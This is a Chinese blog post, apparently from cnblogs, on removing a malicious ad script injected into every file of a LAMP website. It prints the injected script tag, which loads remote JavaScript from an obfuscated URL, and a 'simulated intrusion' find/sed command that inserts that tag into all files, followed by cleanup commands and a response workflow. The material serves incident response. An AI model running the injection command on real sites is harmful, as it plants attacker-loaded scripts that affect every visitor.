解決web網站被掛馬清除方法

来源:https://www.cnblogs.com/su-root/archive/2018/11/17/9976243.html
-Advertisement-
Play Games

案例:某公司一個lamp的伺服器網站站點目錄下所有文件均被植入了廣告腳本如下內容: <script language=javascriptsrc=http://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad> </script>' 包括圖片文件也為植 ...


案例:某公司一個lamp的伺服器網站站點目錄下所有文件均被植入了廣告腳本如下內容:

<script language=javascriptsrc=http://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad>

</script>'

包括圖片文件也為植入了,網站打開時就會調用這個地址,顯示一個廣告,造成的用戶體驗很惡劣,那麼如何快速處理呢。

解決方法:思路是:需要查看所有目錄所有文件,把以上被植入的內容刪除掉。

測試數據如下:

入侵模擬植入命令:

find ./ -type f|xargs sed -i '1 i <script language=javascript

 src=http://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad></script>'

 

解決方法:

1、  正則方法:

find ./ -type f -exec sed -i '/^.*google_ad.*$/d' {} \;

註意:本方法容易把程式了i的其他正常內容給刪掉了,匹配關鍵字很重要,因此不建議使用此方法。

2、  完整去除,擺脫正則匹配的麻煩:

find ./ -type f|xargs sed -i '/<script language=javascript src=htt

p:\/\/%4%66E%78%72%67%2E%70%6F\/x.js?google_ad=93x28_ad><\/script>/d'

 

find ./ -type f|xargs sed -i 's#<script language=javascript src=ht

tp://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad></script>##g'

 

從發現問題到解決流程:

1、  運營人員、網站用戶發現問題,網站有彈窗廣告。

2、  運營人員報給開發人員,開發人員聯繫運維人員,開發和運維共同解決。

3、  開發發現的問題原因就是所有站點目錄被植入一段js代碼。

4、  運維人員解決問題:a.備份原始出問題的原始文件。b.歷史備份覆蓋。c.find+sed替換。

5、  詳細查看日誌,查找問題發生來源並修補漏洞。


您的分享是我們最大的動力!

-Advertisement-
Play Games
更多相關文章
  • 一個偶爾出現令人不爽的WPF界面顯示問題:“未將對象引用設置到對象的實例”。 ...
  • 使用VIM編輯commit註釋信息在命令輸入模式下麵,輸入字母”i”,則VIM進入到插入模式,接著輸入自己的註釋內容;完成註釋後需要退出:1)按鍵Esc,如果無效,連續按兩次2)當底部提示行出現空白時,輸入冒號“:”3)再輸入字母“q”,回車 (輸入wq,為保存退出)但是實際上使用vim非常不方便,... ...
  • 因項目需要,傳輸數據需要加密,因此有了一些經驗,現簡易抽出來分享! 請求:前端cryptojs用rsa/aes 或 rsa/des加密,後端.net 解密返回後端.net用rsa/aes 或 rsa/des加密,前端cryptojs解密 圖示: 數據發送加密: 返回數據加密: 開源代碼分享:http ...
  • 前言 core也用了很長一段時間了,發現很多小伙伴不知道如何調試core的代碼。 可想而知,以前使用mvc的時候,不需要發佈代碼,直接iis地址指向項目源碼,然後附加到進程w3wp.exe就可以調試了。 在core的項目裡面已經不能這樣玩了... 正文 1. 安裝Open Command Line ...
  • 將很早之前寫的一個小組件重新整理優化一下,做成一個通用的功能。適用於導出資料庫的結構(表、欄位等)到Word或將體檢數據自動生成Word版的體檢報告等。代碼:Github 一、主要需要完成功能: 1. 靈活的配置規則及word樣式設置(文本、表格、圖表、顏色等). 2. 支持表格. 3. 支持圖表. ...
  • SignalR 設計理念(一) 實現客戶端和伺服器端的實時通訊. 問題闡述 1. 客戶端提供的方法不確定! 2. 客戶端的方法參數不確定! 3. 不同的名稱和參數要分別調用指定的方法! 4. 調用客戶端方法時,忽略大小寫! 例如: 針對以上問題,你會如何設計伺服器架構? SignalR 選用 動態數 ...
  • Windows -- 寫一個批處理文件.bat刪除舊文件 1. 批處理文件 del_old_file.bat rem 刪除D:\temp目錄下7天前的文件 Forfiles /p D:\temp /s /d -7 /m *.* /c "cmd /c del /q /f @path" rem 刪除C: ...
  • 轉自:https://www.cnblogs.com/zejin2008/p/7144514.html 先安裝包依賴: 安裝vm tool 按提示操作即可。 有/mnt/hgfs但沒有共用文件的解決方法: 這時不能用mount工具掛載,而是得用vmhgfs-fuse,需要安裝工具包 此時進入/mnt ...
一周排行
    -Advertisement-
    Play Games
  • 移動開發(一):使用.NET MAUI開發第一個安卓APP 對於工作多年的C#程式員來說,近來想嘗試開發一款安卓APP,考慮了很久最終選擇使用.NET MAUI這個微軟官方的框架來嘗試體驗開發安卓APP,畢竟是使用Visual Studio開發工具,使用起來也比較的順手,結合微軟官方的教程進行了安卓 ...
  • 前言 QuestPDF 是一個開源 .NET 庫,用於生成 PDF 文檔。使用了C# Fluent API方式可簡化開發、減少錯誤並提高工作效率。利用它可以輕鬆生成 PDF 報告、發票、導出文件等。 項目介紹 QuestPDF 是一個革命性的開源 .NET 庫,它徹底改變了我們生成 PDF 文檔的方 ...
  • 項目地址 項目後端地址: https://github.com/ZyPLJ/ZYTteeHole 項目前端頁面地址: ZyPLJ/TreeHoleVue (github.com) https://github.com/ZyPLJ/TreeHoleVue 目前項目測試訪問地址: http://tree ...
  • 話不多說,直接開乾 一.下載 1.官方鏈接下載: https://www.microsoft.com/zh-cn/sql-server/sql-server-downloads 2.在下載目錄中找到下麵這個小的安裝包 SQL2022-SSEI-Dev.exe,運行開始下載SQL server; 二. ...
  • 前言 隨著物聯網(IoT)技術的迅猛發展,MQTT(消息隊列遙測傳輸)協議憑藉其輕量級和高效性,已成為眾多物聯網應用的首選通信標準。 MQTTnet 作為一個高性能的 .NET 開源庫,為 .NET 平臺上的 MQTT 客戶端與伺服器開發提供了強大的支持。 本文將全面介紹 MQTTnet 的核心功能 ...
  • Serilog支持多種接收器用於日誌存儲,增強器用於添加屬性,LogContext管理動態屬性,支持多種輸出格式包括純文本、JSON及ExpressionTemplate。還提供了自定義格式化選項,適用於不同需求。 ...
  • 目錄簡介獲取 HTML 文檔解析 HTML 文檔測試參考文章 簡介 動態內容網站使用 JavaScript 腳本動態檢索和渲染數據,爬取信息時需要模擬瀏覽器行為,否則獲取到的源碼基本是空的。 本文使用的爬取步驟如下: 使用 Selenium 獲取渲染後的 HTML 文檔 使用 HtmlAgility ...
  • 1.前言 什麼是熱更新 游戲或者軟體更新時,無需重新下載客戶端進行安裝,而是在應用程式啟動的情況下,在內部進行資源或者代碼更新 Unity目前常用熱更新解決方案 HybridCLR,Xlua,ILRuntime等 Unity目前常用資源管理解決方案 AssetBundles,Addressable, ...
  • 本文章主要是在C# ASP.NET Core Web API框架實現向手機發送驗證碼簡訊功能。這裡我選擇是一個互億無線簡訊驗證碼平臺,其實像阿裡雲,騰訊雲上面也可以。 首先我們先去 互億無線 https://www.ihuyi.com/api/sms.html 去註冊一個賬號 註冊完成賬號後,它會送 ...
  • 通過以下方式可以高效,並保證數據同步的可靠性 1.API設計 使用RESTful設計,確保API端點明確,並使用適當的HTTP方法(如POST用於創建,PUT用於更新)。 設計清晰的請求和響應模型,以確保客戶端能夠理解預期格式。 2.數據驗證 在伺服器端進行嚴格的數據驗證,確保接收到的數據符合預期格 ...